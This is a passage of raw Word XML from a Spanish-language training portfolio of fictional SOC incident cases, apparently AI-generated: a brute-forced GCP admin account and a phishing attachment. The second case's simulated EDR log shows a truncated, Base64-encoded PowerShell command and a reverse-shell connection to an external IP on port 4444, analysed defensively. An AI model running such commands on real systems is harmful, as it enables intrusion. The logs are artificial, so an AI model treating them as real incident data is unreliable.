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este documento se muestran casos de ciberseguridad no reales con su analisis y resolucion, con el objetivo de demostrar conocimiento en el ambito practico. estos casos fueron hechos con claude los cuales fui resolviendo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tb9vxnkz8x8" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 1: Acceso sospechoso a una cuenta de administrador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Nota:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analista SOC junior en una pyme que usa Google Workspace + GCP. Lunes a la mañana.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Alerta recibida:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> La cuenta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin@empresa-ficticia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuvo un inicio de sesión exitoso a las 03:47 AM (fuera de horario laboral), precedido por 4 intentos fallidos en los 10 minutos previos.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m046rmdcydq" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigación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 Verificación de la cuenta y patrón de acceso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="70b8ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcloud</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w: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00F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  protoPayload.authenticationInfo.principalEmail="admin@empresa-ficticia.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND timestamp&gt;="2026-09-01T00:00:00Z"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:rPr>
          <w:color w:val="9be963"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--format=json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--order=asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: 4 intentos de login fallidos + 1 exitoso, todos desde la IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">185.220.101.47</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nodo de salida de red Tor), en un intervalo regular de ~1-2 minutos — patrón consistente con ataque de fuerza bruta automatizado, no con error humano.</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 Revisión de actividad posterior al login exitoso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="70b8ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcloud</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w: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016">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  protoPayload.authenticationInfo.principalEmail="admin@empresa-ficticia.com"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND timestamp&gt;="2026-09-01T03:47:22Z"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr>
          <w:color w:val="9be963"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--format=json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--order=asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: el atacante otorgó rol de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Owner</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a una cuenta externa (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">atacante.externo@gmail.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) y accedió/descargó un archivo con datos de nómina de empleados (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nominas_2026.xlsx</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1p7opg6x7s7" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de incidente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Vector:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ataque de fuerza bruta contra cuenta de administrador sin MFA habilitado, originado desde red Tor (03:41–03:47 AM).</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Escalación de privilegios (rol Owner otorgado a cuenta externa no autorizada) y exfiltración de archivo con datos personales de empleados (nómina).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Remediación aplicada:</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Suspensión inmediata de la cuenta comprometida.</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Revocación de todas las sesiones activas y tokens asociados.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Revocación del rol Owner ilegítimo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="70b8ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcloud</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">projects</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remove-iam-policy-binding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">empresa-ficticia</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024">
      <w:pPr>
        <w:rPr>
          <w:color w:val="eaecf0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--member="user:atacante.externo@gmail.com"</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025">
      <w:pPr>
        <w:rPr>
          <w:color w:val="9be963"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eaecf0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="9be963"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--role="roles/owner"</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Reseteo de contraseña de la cuenta afectada.</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Activación de MFA (autenticación multifactor) para prevenir recurrencia.</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Bloqueo de la IP de origen como medida secundaria.</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Notificación a Legal/Compliance, RR.HH. y empleados afectados por la exposición de datos de nómina.</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Framework de referencia:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK — T1110 (Brute Force), T1078.004 (Valid Accounts: Cloud Accounts).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6by9h8e26tt" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 2: Correo de phishing con posible compromiso de endpoint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Nota:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analista SOC junior en una pyme que usa Google Workspace + GCP. Miércoles a media mañana.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Alerta recibida:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un empleado del área de Contabilidad reporta haber abierto, hace 20 minutos, un archivo adjunto de un correo que parecía una factura de un proveedor habitual. Tras abrirlo, su computadora empezó a andar con lentitud y Windows Defender mostró una alerta que cerró sin leer con atención.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Tarea:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> determinar si hubo compromiso real del equipo, qué tipo de amenaza es, y qué acciones tomar.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up8flb504ng" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis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 Contención temprana del endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antes de analizar cualquier dato, se procede a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aislar el equipo de la red</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (desconexión de red/Wi-Fi o vía consola del EDR), evitando propagación lateral hacia otras máquinas. Importante: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no apagar el equipo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, para preservar evidencia en memoria RAM (procesos maliciosos activos, conexiones abiertas).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2. Información recabada del empleado</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Dirección de correo del remitente y contenido del mensaje.</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Formato y nombre del archivo adjunto.</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Si habilitó macros o algún permiso especial al abrirlo.</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Si ingresó credenciales en algún sitio al que lo haya redirigido el correo.</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Se solicita conservar el correo original, sin eliminarlo (evidencia).</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3. Revisión de actividad del endpoint (logs del EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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"2026-09-03T10:15:02Z"</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event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"process_created"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process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"factura_0847.exe"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parent_process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"outlook.exe"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user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"jgonzalez"</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E">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"2026-09-03T10:15:04Z"</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event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"process_created"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process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"powershell.exe"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parent_process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"factura_0847.exe"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command_line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"powershell -enc JABzAD0ATgBlAHcALQBP..."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"2026-09-03T10:15:09Z"</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event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"network_connection"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process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"powershell.exe"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destination_ip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"91.203.145.12"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destination_port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4444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protocol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"TCP"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timestamp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"2026-09-03T10:15:11Z"</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event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"defender_alert"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alert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"Behavior:Win32/Suspicious.EncodedCommand"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action_taken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"blocked_partial"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80a18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status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"user_dismissed_notification"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1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2b303b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b303b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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Lectura del log:</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factura_0847.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (disfrazado de documento) ejecutó </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — comportamiento anómalo para un archivo de "factura".</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El comando de PowerShell usó el flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-enc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (codificado en Base64), técnica típica para ocultar su contenido real y evadir antivirus basados en firmas de texto.</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PowerShell abrió una conexión saliente hacia una IP externa por el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">puerto 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, puerto clásico de herramientas de post-explotación (Metasploit/Cobalt Strike) para </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — el equipo comprometido "llama" al atacante en vez de que el atacante entre directamente, evadiendo así firewalls perimetrales.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Conclusión técnica:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no se trata solo de phishing (vector de entrega); el adjunto actuó como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
